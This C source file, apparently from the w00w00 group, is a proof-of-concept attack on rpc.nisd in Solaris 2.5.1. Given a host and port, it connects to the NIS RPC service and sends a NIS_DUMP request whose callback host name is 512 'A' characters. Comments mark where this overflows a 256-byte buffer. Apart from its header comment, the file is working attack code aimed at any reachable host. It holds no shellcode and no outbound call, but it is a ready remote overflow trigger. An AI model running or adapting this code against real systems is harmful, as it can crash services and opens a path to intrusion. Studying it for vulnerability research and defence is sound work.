/* w00w00! */
/* This will test a vulnerability in rpc.nisd on Solaris 2.5.1 */
/* (and maybe other versions). See w00w00/vuls/nisvuls for     */
/* details.						       */
/* 							       */
/* This version takes a second argument as the port that       */
/* rps.nisd is listening on (you can get this from running:    */
/*  rpcinfo -p <host>					       */
/* where host is the host you're testing for a vulnerability.  */
/* 							       */
/* nis_clnt1.c just takes one argument which is the hostname.  */
/* It will find the port from the portmapper.                  */
/* 							       */
/* Shok (Matt Conover), shok@dataforce.net		       */

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <memory.h>
#include <string.h>
#include <sys/time.h>

#include "nis.h"

/* Default timeout can be changed using clnt_control() */
static struct timeval TIMEOUT = { 60, 0 };

log_result *
nis_dump_3(argp, clnt)
	dump_args *argp;
	CLIENT *clnt;
{
	static log_result clnt_res;

	memset((char *)&clnt_res, 0, sizeof (clnt_res));
	if (clnt_call(clnt, NIS_DUMP,
		(xdrproc_t) xdr_dump_args, (caddr_t) argp,
		(xdrproc_t) xdr_log_result, (caddr_t) &clnt_res,
		TIMEOUT) != RPC_SUCCESS) {
		return (NULL);
	}
	return (&clnt_res);
}

void main(int argc, char **argv)
{
  register int i;
  int sock = RPC_ANYSOCK;

  log_result *result;

  dump_args da;

  char   buf[512];
  register CLIENT  *cl;

  struct hostent *hp;
  struct sockaddr_in saddr;
  struct timeval ctimeout;


  if (argc < 3) {
     printf(" Usage: %s <host> <port>\n", argv[0]);
     exit(1);
  }


  if ((hp = gethostbyname(argv[1])) == NULL) {
	herror("gethostbyname");
	exit(1);
  }

  ctimeout.tv_sec  = 10;
  ctimeout.tv_usec = 0;
  
  bcopy(hp->h_addr, (caddr_t)&saddr.sin_addr, hp->h_length);
  saddr.sin_family = AF_INET;
  saddr.sin_port   = htons(atoi(argv[2]));


  if ((cl = clnttcp_create(&saddr, NIS_PROG, NIS_VERSION, &sock, 0, 0)) 
          == NULL) {
     clnt_pcreateerror("clnttcpp_create");
     printf("Try using nis_clnt1_tcp (nis_clnt1_tcp.c) instead.\n");
     exit(1);
  }

  for (i = 0; i < sizeof(buf); i++) buf[i] = 'A';
  buf[i] = '\0';

  /* Set up arguments. */
  bzero(&da, sizeof(da));

  /* make room for da.cbhost_val */
  da.da_cbhost.da_cbhost_val = (nis_server *)malloc(sizeof(struct nis_server));
  bzero(da.da_cbhost.da_cbhost_val, sizeof(struct nis_server));

  /* Buffer to overflow is MAXNETNAMELEN + 1, which is 256. */
  da.da_time = 1;                                   /* Anything > 0.  */
  da.da_dir  = "/tmp";                              /* Should work.   */
  da.da_cbhost.da_cbhost_len = 1;                   /* Must be one.   */
  da.da_cbhost.da_cbhost_val->name = strdup(buf);   /* Overflow here. */
  da.da_cbhost.da_cbhost_val->key_type = NIS_PK_DH; /* Must be this.  */

  result = nis_dump_3(&da, cl);

  if (result == NULL) {
     clnt_perror(cl, "rpc");
     exit(1);
  }

  printf("All finished.\n");

  clnt_destroy(cl);
  free(da.da_cbhost.da_cbhost_val->name);
  free(da.da_cbhost.da_cbhost_val);
}
